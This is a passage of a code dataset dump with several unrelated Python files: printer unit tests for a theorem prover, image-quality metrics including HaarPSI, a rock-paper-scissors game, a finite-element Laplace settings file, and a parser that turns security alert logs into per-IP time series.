\n","repo_name":"Barisimre/AoC2020","sub_path":"5_1.py","file_name":"5_1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21785892179","text":"# Author: Bohua Zhan\n\nimport unittest\n\nfrom kernel.type import TVar, Type, TFun, boolT\nfrom kernel.term import Var, Const, Comb, Abs, Bound, Term\nfrom kernel.thm import Thm\nfrom logic import logic\nfrom logic import nat\nfrom logic import list\nfrom logic import set\nfrom logic import basic\nfrom logic import function\nfrom syntax import printer\n\nthy = basic.load_theory('list')\n\nA = Var(\"A\", boolT)\nB = Var(\"B\", boolT)\nC = Var(\"C\", boolT)\nTa = TVar(\"a\")\na = Var(\"a\", Ta)\nb = Var(\"b\", Ta)\nP = Var(\"P\", TFun(Ta, boolT))\nQ = Var(\"Q\", TFun(Ta, boolT))\nR = Var(\"R\", TFun(Ta, Ta, boolT))\nf = Var(\"f\", TFun(Ta, Ta))\nnn = Var(\"n\", TFun(boolT, boolT))\nm = Var(\"m\", nat.natT)\nn = Var(\"n\", nat.natT)\np = Var(\"p\", nat.natT)\nxs = Var(\"xs\", Type(\"list\", Ta))\nys = Var(\"ys\", Type(\"list\", Ta))\nzs = Var(\"zs\", Type(\"list\", Ta))\neq = Term.mk_equals\nimp = Term.mk_implies\nconj = logic.mk_conj\ndisj = logic.mk_disj\nabs = Term.mk_abs\nall = Term.mk_all\nneg = logic.neg\nexists = logic.mk_exists\nmk_if = logic.mk_if\n\nclass PrinterTest(unittest.TestCase):\n def testPrintLogical(self):\n test_data = [\n # Equality and implies\n (eq(a, b), \"a = b\"),\n (imp(A, B), \"A --> B\"),\n (imp(A, B, C), \"A --> B --> C\"),\n (imp(imp(A, B), C), \"(A --> B) --> C\"),\n (imp(A, eq(a, b)), \"A --> a = b\"),\n (eq(imp(A, B), imp(B, C)), \"(A --> B) = (B --> C)\"),\n (eq(A, eq(B, C)), \"A = (B = C)\"),\n (eq(eq(A, B), C), \"A = B = C\"),\n\n # Conjunction and disjunction\n (conj(A, B), \"A & B\"),\n (disj(A, B), \"A | B\"),\n (conj(A, conj(B, C)), \"A & B & C\"),\n (conj(conj(A, B), C), \"(A & B) & C\"),\n (disj(A, disj(B, C)), \"A | B | C\"),\n (disj(disj(A, B), C), \"(A | B) | C\"),\n (disj(conj(A, B), C), \"A & B | C\"),\n (conj(disj(A, B), C), \"(A | B) & C\"),\n (disj(A, conj(B, C)), \"A | B & C\"),\n (conj(A, disj(B, C)), \"A & (B | C)\"),\n (disj(conj(A, B), conj(B, C)), \"A & B | B & C\"),\n (conj(disj(A, B), disj(B, C)), \"(A | B) & (B | C)\"),\n\n # Negation\n (neg(A), \"~A\"),\n (neg(neg(A)), \"~~A\"),\n\n # Constants\n (logic.true, \"true\"),\n (logic.false, \"false\"),\n\n # Mixed\n (imp(conj(A, B), C), \"A & B --> C\"),\n (imp(A, disj(B, C)), \"A --> B | C\"),\n (conj(A, imp(B, C)), \"A & (B --> C)\"),\n (disj(imp(A, B), C), \"(A --> B) | C\"),\n (neg(conj(A, B)), \"~(A & B)\"),\n (neg(imp(A, B)), \"~(A --> B)\"),\n (neg(eq(A, B)), \"~A = B\"),\n (eq(neg(A), B), \"(~A) = B\"),\n (eq(neg(A), neg(B)), \"(~A) = (~B)\"),\n\n # Abstraction\n (abs(a, conj(P(a),Q(a))), \"%a. P a & Q a\"),\n\n # Quantifiers\n (all(a, P(a)), \"!a. P a\"),\n (all(a, all(b, conj(P(a),P(b)))), \"!a. !b. P a & P b\"),\n (all(a, conj(P(a), Q(a))), \"!a. P a & Q a\"),\n (conj(all(a, P(a)), Q(a)), \"(!a. P a) & Q a\"),\n (all(a, imp(P(a), Q(a))), \"!a. P a --> Q a\"),\n (imp(all(a, P(a)), Q(a)), \"(!a. P a) --> Q a\"),\n (imp(all(a, P(a)), all(a, Q(a))), \"(!a. P a) --> (!a. Q a)\"),\n (imp(exists(a, P(a)), exists(a, Q(a))), \"(?a. P a) --> (?a. Q a)\"),\n (eq(A, all(a, P(a))), \"A = (!a. P a)\"),\n (exists(a, P(a)), \"?a. P a\"),\n (exists(a, all(b, R(a, b))), \"?a. !b. R a b\"),\n (all(a, exists(b, R(a, b))), \"!a. ?b. R a b\"),\n\n # If\n (mk_if(A, a, b), \"if A then a else b\"),\n (eq(mk_if(A, a, b), a), \"(if A then a else b) = a\"),\n (mk_if(A, P, Q), \"if A then P else Q\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintFunction(self):\n test_data = [\n (P(a), \"P a\"),\n (P(f(a)), \"P (f a)\"),\n (R(a,a), \"R a a\"),\n (nn(conj(A,B)), \"n (A & B)\"),\n (conj(nn(A), B), \"n A & B\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintArithmetic(self):\n test_data = [\n (nat.plus(m, n), \"m + n\"),\n (nat.plus(nat.plus(m, n), p), \"m + n + p\"),\n (nat.plus(m, nat.plus(n, p)), \"m + (n + p)\"),\n (nat.times(m, n), \"m * n\"),\n (nat.times(nat.times(m, n), p), \"m * n * p\"),\n (nat.times(m, nat.times(n, p)), \"m * (n * p)\"),\n (nat.plus(m, nat.times(n, p)), \"m + n * p\"),\n (nat.times(m, nat.plus(n, p)), \"m * (n + p)\"),\n (nat.zero, \"0\"),\n (nat.plus(nat.zero, nat.zero), \"0 + 0\"),\n (nat.times(m, nat.zero), \"m * 0\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testBinary(self):\n test_data = [\n (nat.one, \"1\"),\n (nat.bit0(nat.one), \"2\"),\n (nat.bit1(nat.one), \"3\"),\n (nat.Suc(nat.one), \"Suc 1\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintList(self):\n nil = list.nil\n cons = list.mk_cons\n append = list.mk_append\n test_data = [\n (append(xs, ys), \"xs @ ys\"),\n (append(append(xs, ys), zs), \"(xs @ ys) @ zs\"),\n (append(xs, append(ys, zs)), \"xs @ ys @ zs\"),\n (cons(a, nil(Ta)), \"[a]\"),\n (cons(a, cons(b, nil(Ta))), \"[a, b]\"),\n (cons(a, xs), \"a # xs\"),\n (append(cons(a, nil(Ta)), cons(b, nil(Ta))), \"[a] @ [b]\"),\n (cons(a, append(xs, ys)), \"a # xs @ ys\"),\n (append(cons(a, xs), ys), \"(a # xs) @ ys\"),\n (list.cons(Ta)(a), \"cons a\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintSet(self):\n A = Var(\"A\", set.setT(Ta))\n B = Var(\"B\", set.setT(Ta))\n x = Var(\"x\", Ta)\n test_data = [\n (set.empty_set(Ta), \"({}::'a set)\", \"(∅::'a set)\"),\n (set.mk_mem(x, A), \"x MEM A\", \"x ∈ A\"),\n (set.mk_subset(A, B), \"A SUB B\", \"A ⊆ B\"),\n (set.mk_inter(A, B), \"A INTER B\", \"A ∩ B\"),\n (set.mk_union(A, B), \"A UNION B\", \"A ∪ B\"),\n ]\n\n for t, s1, s2 in test_data:\n self.assertEqual(printer.print_term(thy, t), s1)\n self.assertEqual(printer.print_term(thy, t, unicode=True), s2)\n\n def testPrintFunction(self):\n test_data = [\n (function.mk_fun_upd(f, a, b), \"(f)(a := b)\"),\n (function.mk_fun_upd(f, a, b, b, a), \"(f)(a := b, b := a)\"),\n ]\n\n thy = basic.load_theory('function')\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintWithType(self):\n test_data = [\n (list.nil(Ta), \"([]::'a list)\"),\n (eq(list.nil(Ta), list.nil(Ta)), \"([]::'a list) = []\"),\n (all(a, eq(a, a)), \"!a::'a. a = a\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintUnicode(self):\n test_data = [\n (conj(A, B), \"A ∧ B\"),\n (disj(A, B), \"A ∨ B\"),\n (imp(A, B), \"A ⟶ B\"),\n (abs(a, P(a)), \"λa. P a\"),\n (all(a, P(a)), \"∀a. P a\"),\n (exists(a, P(a)), \"∃a. P a\"),\n (neg(A), \"¬A\"),\n (nat.plus(m, n), \"m + n\"),\n (nat.times(m, n), \"m * n\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t, unicode=True), s)\n\n def testPrintHighlight(self):\n \"\"\"Test highlight\"\"\"\n # 0, 1, 2, 3 = NORMAL, BOUND, VAR, TVAR\n test_data = [\n (abs(a,P(a)), [('%',0),('a',1),('. ',0),('P ',2),('a',1)]),\n (all(a,P(a)), [('!',0),('a',1),('. ',0),('P ',2),(\"a\",1)]),\n (all(a,all(b,conj(P(a),P(b)))), [('!',0),('a',1),('. !',0),('b',1),('. ',0),('P ',2),('a',1),(' & ',0),('P ',2),('b',1)]),\n (exists(a,all(b,R(a,b))), [('?',0),(\"a\",1),('. !',0),('b',1),('. ',0),('R ',2),('a b',1)]),\n (exists(a,P(a)), [('?',0),('a',1),('. ',0),('P ',2),('a',1)]),\n (disj(disj(A,B),C), [('(',0),('A',2),(' | ',0),('B',2),(') | ',0),('C',2)]),\n (imp(imp(A,B),C), [('(',0),('A',2),(' --> ',0),('B',2),(') --> ',0),('C',2)]),\n (abs(a,a), [('%',0),('a',1),('::',0),(\"'a\",3),('. ',0),('a',1)]),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t, highlight=True), s)\n\n def testPrintThmHighlight(self):\n \"\"\"Test printing of theorems with highlight.\"\"\"\n # 0, 1, 2, 3 = NORMAL, BOUND, VAR, TVAR\n A = Var('A', boolT)\n B = Var('B', boolT)\n A_to_B = Term.mk_implies(A, B)\n th = Thm([A, A_to_B], B)\n res = printer.print_thm(thy, th, highlight=True)\n self.assertEqual(res, [('A',2),(', ',0),('A',2),(' --> ',0),('B',2),(' ',0),('|-',0),(' ',0),('B',2)])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"zhouwenfan/temp","sub_path":"syntax/tests/printer_test.py","file_name":"printer_test.py","file_ext":"py","file_size_in_byte":9176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20540804158","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1'\n\nsetup(name='gatekeeper',\n version=version,\n description=\"\",\n long_description=\"\"\" \"\"\",\n classifiers=[],\n keywords='',\n author='',\n author_email='',\n url='',\n license='',\n packages=find_packages('src'),\n package_dir = {'': 'src'},\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n \"cromlech.browser\",\n \"cromlech.webob\",\n \"dolmen.tales\",\n \"dolmen.template\",\n \"dolmen.forms.base\",\n \"dolmen.view\",\n \"dolmen.viewlet\",\n \"dolmen.message\",\n \"webob\",\n \"zope.i18nmessageid\",\n ],\n)\n","repo_name":"novareto/gatekeeper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30460448248","text":"# Importing the random module\nimport random\n # Defining the get_user_choice function\ndef get_user_choice():\n # while loop to repeatedly prompt the user until they enter a valid choice ('rock', 'paper', or 'scissors'\n while True:\n choice = input(\"Enter your choice (rock, paper, scissors): \")\n if choice in [\"rock\", \"paper\", \"scissors\"]:\n return choice\n else:\n print(\"Invalid choice. Please try again.\")\n# Defining the get_computer_choice function\ndef get_computer_choice():\n choices = [\"rock\", \"paper\", \"scissors\"]\n return random.choice(choices)\n\n# Defining the determine_winner function\ndef determine_winner(user_choice, computer_choice):\n if user_choice == computer_choice:\n return \"It's a tie!\"\n elif (\n (user_choice == \"rock\" and computer_choice == \"scissors\") or\n (user_choice == \"paper\" and computer_choice == \"rock\") or\n (user_choice == \"scissors\" and computer_choice == \"paper\")\n ):\n return \"You win!\"\n else:\n return \"Computer wins!\"\n\n# Start the game with the welcome message\nprint(\"Welcome to Rock, Paper, Scissors Game!\")\n\n# Prompting the user to enter their choice\nuser_choice = get_user_choice()\n\n# Generating the computer's choice and print it\ncomputer_choice = get_computer_choice()\nprint(\"Computer chooses:\", computer_choice)\n\n# Determiinge the winner and printing the result\nresult = determine_winner(user_choice, computer_choice)\nprint(result)\n","repo_name":"topisteronyango/plp-python-code-challenge","sub_path":"challenge3-rock-paper-scissors/rcokpaperscissors.py","file_name":"rcokpaperscissors.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17370711783","text":"import numpy as np\nfrom sys import argv\nimport cs273b\n\ndata_dir = '/datadrive/project_data/'\n\ninsFreqs = []\ndelFreqs = []\nreference, ambiguous_bases = cs273b.load_bitpacked_reference(data_dir + \"Homo_sapiens_assembly19.fasta.bp\")\nfor i in range(1, 24):\n if i == 23:\n ch = 'X'\n else:\n ch = str(i)\n print('Processing ' + ch)\n referenceChr = reference[ch]\n c_len = len(referenceChr)\n\n insertionLocations = np.loadtxt(data_dir + \"indelLocations{}_ins.txt\".format(ch)).astype(int)\n deletionLocations = np.loadtxt(data_dir + \"indelLocations{}_del.txt\".format(ch)).astype(int)\n #indelLocations = np.concatenate((insertionLocations, deletionLocations)) - 1\n\n insFreq = float(len(insertionLocations)) / c_len\n delFreq = float(len(deletionLocations)) / c_len\n insFreqs.append(insFreq)\n delFreqs.append(delFreq)\n continue\n\n bucketsize = 1000000\n num_buckets = (c_len + bucketsize - 1) // bucketsize\n num_indels = [0]*num_buckets\n bucketsizes = [bucketsize]*num_buckets\n bucketsizes[-1] = c_len % bucketsize\n\n for il in indelLocations:\n num_indels[il / bucketsize] += 1\n\n freqs = [float(x)/y for x, y in zip(num_indels, bucketsizes)]\n\n print(np.array(freqs))\n\n #print(num_indels)\n #print(bucketsizes)\n\nprint(insFreqs)\nprint(delFreqs)\n","repo_name":"gakgsr/CS273b-Extension","sub_path":"all_histograms.py","file_name":"all_histograms.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8491637981","text":"#!/usr/bin/env python3\nimport warnings\nimport numpy as np\nfrom math import log10, sqrt\nfrom tensorflow.image import ssim\n\n# Check size and types\ndef assert_sizeImages(original, modified):\n original = np.asarray(original)\n modified = np.asarray(modified)\n\n assert original.shape == modified.shape, \"Supplied images have different sizes \" + \\\n\tstr(original.shape) + \" and \" + str(modified.shape)\n \n if original.dtype != modified.dtype:\n msg = \"Supplied images have different dtypes \" + \\\n str(original.dtype) + \" and \" + str(modified.dtype)\n warnings.warn(msg)\n\n if len(original.shape) == 2:\n original = original[:,:,np.newaxis]\n modified = modified[:,:,np.newaxis]\n\n return original.astype(np.float64), modified.astype(np.float64)\n\n\n# Mean Square Error\ndef metric_MSE(original, modified):\n original, modified = assert_sizeImages(original,modified)\n return np.mean((original.astype(np.float64) - modified.astype(np.float64)) ** 2)\n\n\n# Root Mean Square Error\ndef metric_RMSE(original, modified):\n return sqrt(metric_MSE(original, modified))\n\n\n# Peak Signal to Noise Ratio\ndef metric_PSNR(original, modified):\n mse = metric_RMSE(original, modified)\n if mse == 0.:\n return np.inf\n return 20 * log10(255.0 / sqrt(mse))\n\n\n# Structural Similarity Index Measure\ndef metric_SSIM(original, modified, L=255):\n original, modified = assert_sizeImages(original,modified)\n return ssim(original, modified, L).numpy()\n\n\n# Spectral Angle Mapper\ndef metric_SAM(original, modified):\n original, modified = assert_sizeImages(original,modified)\n\n original = original.reshape((original.shape[0]*original.shape[1],original.shape[2]))\n modified = modified.reshape((modified.shape[0]*modified.shape[1],modified.shape[2]))\n\n N = original.shape[1]\n sam_angles = np.zeros(N)\n for i in range(original.shape[1]):\n val = np.clip(np.dot(original[:,i],modified[:,i]) / (np.linalg.norm(original[:,i])*np.linalg.norm(modified[:,i])),-1,1)\t\t\n sam_angles[i] = np.arccos(val)\n\n return np.mean(sam_angles)\n\n\n'''\nThis is a re-implmentation of the Python code that implements the HaarPSI metric introduced in\nthe following paper:\nR. Reisenhofer, S. Bosse, G. Kutyniok and T. Wiegand.\nA Haar Wavelet-Based Perceptual Similarity Index for Image Quality Assessment. (PDF)\nSignal Processing: Image Communication, vol. 61, 33-43, 2018.\nThe original Python implmentation can be found here:\nhttp://www.haarpsi.org/\nor here:\nhttps://github.com/rgcda/haarpsi\nThe original Python code computes haar gradients that are iaccurate and inefficient. This has\nbeen fixed in this code. As a result, this version is more accurate, and about 3 times faster.\nThis version of the code is also simpler to understand.\nNOTES:\n[1] Please note that as a result of using more accurate haar gradients, the similarity value\nreturned may be slightly different from the one obtained from the original code.\n[2] The original code limits the gradient computation to 3 scales only. This is the case here\ntoo. But the code generalizes to a greater number of scales too.\n[3] For a rather weak reason (viewing scale), in the original code, every input image is\ndownsampled by 2 in both dimensions. This is mimicked in this code.\n--------------------------\n24 August 2020\n(c) Radhakrishna Achanta\n--------------------------\n'''\n\n# Haar Perceptual Similarity Index\ndef metric_HaarPSI(original, modified):\n original, modified = assert_sizeImages(original,modified)\n \n def subsample(mat):\n\n mat = mat.astype(np.float64)\n out = (mat[0:-1, 0:-1,...] + mat[1:, 1:,...] + mat[1:, 0:-1,...] + mat[0:-1, 1:,...])/4\n return out[::2,::2,...]\n\n def RGB2YIQ(rgb):\n Y = 0.299 * rgb[:, :, 0] + 0.587 * rgb[:, :, 1] + 0.114 * rgb[:, :, 2]\n I = 0.596 * rgb[:, :, 0] - 0.274 * rgb[:, :, 1] - 0.322 * rgb[:, :, 2]\n Q = 0.211 * rgb[:, :, 0] - 0.523 * rgb[:, :, 1] + 0.312 * rgb[:, :, 2]\n\n return Y,I,Q\n\n def compute_haar_gradients(x,scales=3,doavg=True):\n\n grady = np.zeros((scales,)+x.shape)\n gradx = np.zeros((scales,)+x.shape)\n\n for s in range(scales):\n\n x2 = (x[:,:-1] + x[:,1:])*0.5 # average along rows\n grady[s,:-1,:-1] = x2[:-1,:] - x2[1:,:] # compute vertical gradients\n \n y2 = (x[:-1,:] + x[1:,:])*0.5 # average along columns\n gradx[s,:-1,:-1] = y2[:,:-1] - y2[:,1:] # compute horizontal gradients\n\n x[:-1,:-1] = (x2[:-1,:] + y2[:,:-1]) # average and reassign to x\n x = x*0.5\n\n return np.concatenate((grady, gradx),axis=0)\n\n def compute_avg(inp):\n\n out = np.zeros(inp.shape)\n out[:-1,:-1] = (inp[0:-1, 0:-1] + inp[1:, 1:] + inp[1:, 0:-1] + inp[0:-1, 1:])/4\n return out\n\n def compute_weights(coeff_refy, coeff_imgy):\n # Take the maxmimum between the absolute value of the gradients of reference and distorted images\n # for the coarsest level gradients\n v,h = scales-1, scales+scales-1\n wts_vert = np.maximum(np.abs(coeff_refy[v]),np.abs(coeff_imgy[v])) # coarsest vertical gradients\n wts_hori = np.maximum(np.abs(coeff_refy[h]),np.abs(coeff_imgy[h])) # coarsest horizontal gradients\n # wts_hv = (wts_hori+wts_vert)/2\n return wts_hori, wts_vert\n\n def compute_local_similarities_Y(coeff_refy, coeff_imgy):\n # Collect the absolute value of all the fine gradients for the reference image\n mag_ref_vert = np.abs(np.stack([coeff_refy[i] for i in range(scales-1)]))\n mag_ref_hori = np.abs(np.stack([coeff_refy[i+scales] for i in range(scales-1)]))\n\n # Collect the absolute value of all the fine gradents for the distorted image \n mag_img_vert = np.abs(np.stack([coeff_imgy[i] for i in range(scales-1)]))\n mag_img_hori = np.abs(np.stack([coeff_imgy[i+scales] for i in range(scales-1)]))\n\n # Compute the normalized correlation of the gradient magnitudes at the finest level\n local_sim_vert = np.sum((2 * mag_ref_vert * mag_img_vert + C)/(mag_ref_vert**2 + mag_img_vert**2 + C),axis=0)/2 # vertical\n local_sim_hori = np.sum((2 * mag_ref_hori * mag_img_hori + C)/(mag_ref_hori**2 + mag_img_hori**2 + C),axis=0)/2 # horizontal\n\n return local_sim_hori, local_sim_vert\n\n def compute_local_similarities_IQ(coeff_refi, coeff_refq, coeff_imgi, coeff_imgq):\n\n similarity_i = (2 * coeff_refi * coeff_imgi + C) / (coeff_refi**2 + coeff_imgi**2 + C)\n similarity_q = (2 * coeff_refq * coeff_imgq + C) / (coeff_refq**2 + coeff_imgq**2 + C)\n local_sim_iq = (similarity_i + similarity_q)/2\n\n return local_sim_iq\n\n\n # sigmoid function scaed by alpha\n def sigmoid(value, alpha):\n return 1.0 / (1.0 + np.exp(-alpha * value))\n\n # the inverse of the sigmoid function (i.e recovering x from sigmoid values)\n def logit(value, alpha):\n return np.log(value/(1 - value)) / alpha\n\n #----------------------------------\n # The main function.\n # Expected image shape is H,W (gray) or H,W,C (color) for the reference (original) and distorted (modified) images\n #----------------------------------\n def compute_similarity(original,modified):\n \n color_image = (3 == len(modified.shape)) # expected image shape is H,W (gray) or H,W,C (color)\n\n refy = subsample(original)\n imgy = subsample(modified)\n\n if color_image:\n refy,refi,refq = RGB2YIQ(refy.astype(np.float64))\n imgy,imgi,imgq = RGB2YIQ(imgy.astype(np.float64))\n\n coeff_refy = compute_haar_gradients(refy,scales,True)\n coeff_imgy = compute_haar_gradients(imgy,scales,True)\n\n wts_hori, wts_vert = compute_weights(coeff_refy, coeff_imgy)\n sim_yhori, sim_yvert = compute_local_similarities_Y(coeff_refy, coeff_imgy)\n\n weights = np.stack((wts_hori, wts_vert))\n local_similarities = np.stack((sim_yhori, sim_yvert))\n\n if color_image:\n # compute one additional term for weights and local_similarities in case of color images\n coeff_refi = np.abs(compute_avg(refi))\n coeff_refq = np.abs(compute_avg(refq))\n coeff_imgi = np.abs(compute_avg(imgi))\n coeff_imgq = np.abs(compute_avg(imgq))\n\n sim_iq = compute_local_similarities_IQ(coeff_refi, coeff_refq, coeff_imgi, coeff_imgq)\n\n weights = np.stack((wts_hori, wts_vert, (wts_hori+wts_vert)/2))\n local_similarities = np.stack((sim_yhori, sim_yvert, sim_iq))\n\n \n similarity = logit(np.sum(sigmoid(local_similarities[:], alpha) * weights[:]) / np.sum(weights[:]), alpha)**2\n\n return similarity\n\n\n if original.shape != modified.shape:\n raise ValueError(\"The shapes of the reference image and the distorted image do not match.\")\n #----------------------------------\n # Constants for the whole function\n #----------------------------------\n C = 30.0 # experimentally determined constant\n alpha = 4.2 # experimentally determined constant\n scales = 4\n\n return compute_similarity(original,modified)","repo_name":"Flare00/Safe-Eye","sub_path":"src/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":9169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24623339326","text":"import streamlit as st\r\nimport siqr\r\nimport sird\r\n\r\nst.beta_set_page_config(\r\n page_title=\"Modelos Biomatemáticos\",\r\n \tlayout=\"centered\",\r\n \tinitial_sidebar_state=\"expanded\",\r\n)\r\n\r\nmodel = st.sidebar.selectbox('Seleccionar modelo', ['SIR-D','SIQR'])\r\n\r\nif model == 'SIQR':\r\n siqr.main()\r\n\r\nif model == 'SIR-D':\r\n sird.main()","repo_name":"joaquin-silva/modelos-biomatematicos","sub_path":"modelos.py","file_name":"modelos.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70209269032","text":"import numpy as np\nimport sys\n\n# 3D laplace problem\n\nnx = 1\nny = 1\nnz = 4\n\nlocal = True\n\n# Dirichlet boundary conditions\nbc = {}\n\nif not local:\n for j in range(int(ny+1)):\n for i in range(int(nx+1)):\n # x = 0 plane\n x = i/nx\n y = j/ny\n index = int(j*(nx+1) + i)\n \n # z- plane (bottom)\n bc[index] = np.sin(x*np.pi)\n bc[index] = 1.0\n \n # z+ plane (top)\n index += int(nz*(nx+1)*(ny+1))\n bc[index] = np.sin(y*np.pi) + 2.0\n bc[index] = 2.0\n\nrank_no = (int)(sys.argv[-2])\n\nn_elements = [1,1,4]\nif local:\n n_elements = [1,1,1]\n if rank_no == 0:\n n_elements = [1,1,2]\n\n # boundary conditions\n bc = {}\n if rank_no == 0:\n bc = {dof:1.0 for dof in range(4)}\n elif rank_no == 2:\n bc = {-1-dof:2.0 for dof in range(4)}\n\nconfig = {\n \"logFormat\": \"csv\", # \"csv\" or \"json\", format of the lines in the log file, csv gives smaller files\n \"solverStructureDiagramFile\": \"solver_structure.txt\", # output file of a diagram that shows data connection between solvers\n \"FiniteElementMethod\" : {\n \"nElements\": n_elements,\n \"nRanks\": [1,1,1],\n \"inputMeshIsGlobal\": not local,\n \"physicalExtent\": [1.0, 1.0, 3.0],\n \"outputInterval\": 1.0,\n \n \"dirichletBoundaryConditions\": bc,\n \"dirichletOutputFilename\": None, # filename for a vtp file that contains the Dirichlet boundary condition nodes and their values, set to None to disable\n \"neumannBoundaryConditions\": [],\n \"prefactor\": 1,\n \n \"solverType\": \"gmres\",\n \"preconditionerType\": \"none\",\n \"relativeTolerance\": 1e-15,\n \"absoluteTolerance\": 1e-10, # 1e-10 absolute tolerance of the residual \n \"maxIterations\": 10000,\n \"dumpFormat\": \"default\",\n \"dumpFilename\": \"\",\n \n \"OutputWriter\" : [\n {\"format\": \"Paraview\", \"outputInterval\": 1, \"filename\": \"out/laplace\", \"binary\": False, \"fixedFormat\": False, \"onlyNodalValues\":True, \"combineFiles\":True, \"fileNumbering\": \"incremental\"}, \n {\"format\": \"PythonFile\", \"filename\": \"out/laplace\", \"outputInterval\": 1, \"binary\":False, \"onlyNodalValues\":True, \"fileNumbering\": \"incremental\"}\n ]\n },\n}\n","repo_name":"maierbn/opendihu","sub_path":"examples/laplace/laplace3d/settings_dirichlet.py","file_name":"settings_dirichlet.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"14154526357","text":"import json\nimport os\nimport datetime\nimport pandas as pd\nimport numpy as np\n\nimport gzip\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\n\n\n# Helper functions\ndef extract_ip(x):\n if 'Source' in x.keys():\n ip = x['Source'][0].get('IP4', [''])[0]\n if ip is '':\n ip = x['Source'][0].get('IP6', [''])[0]\n if ip is '':\n raise ValueError('Failed to extract IP address')\n else:\n raise ValueError('Failed to access Source record while extracting IP address')\n return ip\n\n\ndef extract_time(x): #window):\n time_marked = x.get('EventTime', '')\n if time_marked is '':\n time_marked = x.get('DetectTime', '')\n if time_marked is '':\n raise ValueError('Failed to extract EventTime or DetectTime timestamp')\n\n fmt = '%Y-%m-%d'\n\n if 'T' in time_marked:\n fmt = fmt+'T'\n else:\n fmt = fmt+' '\n\n fmt = fmt+'%H:%M:%S'\n if '.' in time_marked:\n fmt = fmt+'.%f'\n fmt = fmt+'%z'\n\n if time_marked[-1]=='Z':\n time_marked = time_marked.rstrip('Z')+'+0000'\n\n try:\n timestamp = int(datetime.datetime.strptime(time_marked, fmt).timestamp())\n except ValueError:\n raise\n\n #if window['min'] < 0:\n # window['min'] = timestamp\n #elif timestamp < window['min']:\n # window['min'] = timestamp\n #if window['max'] < timestamp:\n # window['max'] = timestamp\n\n return timestamp\n\n\ndef get_series(evtsAt, length):\n length = np.int(length)\n vector = np.zeros(length, dtype=np.double)\n np.add.at(vector, np.array(evtsAt).astype(np.int), 1)\n #return pd.SparseArray(s, fill_value=0)\n return vector\n\n\ndef get_bin_series(evtsAt, length):\n length = np.int(length)\n vector = np.zeros(length, dtype=np.double)\n np.add.at(vector, np.array(evtsAt).astype(np.int), 1)\n #return pd.SparseArray(s, fill_value=0)\n return vector > 0\n\n#Could be done better\ndef count_blocks(lst):\n last_val = lst[0]\n sum_blocks = 0\n for x in lst:\n if x > 0 and x != last_val:\n sum_blocks += 1\n last_val = x\n return sum_blocks\n\n\n#Preprocess to time series of events, no features\ndef preprocess(file_path, silent=True):\n csv_str = \"ip,timestamp,origin,type,line\\n\" #line is a bit misleading\n\n evt_types = {}\n origins = {}\n\n origins_n = -1\n evt_types_n = -1\n\n proc = 0\n line_num = 0\n\n signs={}\n openf = open\n\n if file_path[-3:] == '.gz':\n import gzip\n openf = gzip.open\n\n with openf(file_path, 'r') as data:\n lst = 0\n curr = 0\n line = data.readline()\n while line:\n #To build line index for full event retrieval, read event with readline()\n curr = lst\n lst = data.tell()\n\n line_num = line_num + 1\n x = json.loads(line)\n\n try:\n #name = str(x['Node'][0]['Name'])\n name = str(x.get('Node', ['None']))\n category = str(x.get('Category', ['None']))\n\n #val = signs.get(str(x['Node']), 0)\n #signs[str(x['Node'])] = val+1\n\n origin = origins.get(name, origins_n+1)\n if origin > origins_n:\n origins[name] = origins_n+1\n origins_n = origins_n+1\n\n evt_type = evt_types.get(category, evt_types_n+1)\n if evt_type > evt_types_n:\n evt_types[category] = evt_types_n+1\n evt_types_n = evt_types_n+1\n\n ip = extract_ip(x)\n\n timestamp = extract_time(x)\n\n csv_str += f\"{ip},{timestamp},{origin},{evt_type},{curr}\\n\"#.format(ip, timestamp, origin, evt_type, curr)\n\n proc += 1\n\n except ValueError as err:\n if not silent:\n print(err, end=', ')\n print('while processing line {}'.format(line_num))\n pass\n finally:\n #if linenu > 1000: break\n pass\n\n line = data.readline()\n\n # with open('./data/Nodes.txt', 'w') as f:\n # for key, val in signs.items():\n # print('{}:{}'.format(key,val), file=f)\n\n res = pd.read_csv(StringIO(csv_str)) # it is faster the appending to data frame :)\n\n dt_origin = pd.CategoricalDtype(list(origins.keys()), ordered=True)\n dt_type = pd.CategoricalDtype(list(evt_types.keys()), ordered=True)\n\n res['origin'] = pd.Series(pd.Categorical.from_codes(codes=res['origin'].values, dtype=dt_origin))\n res['type'] 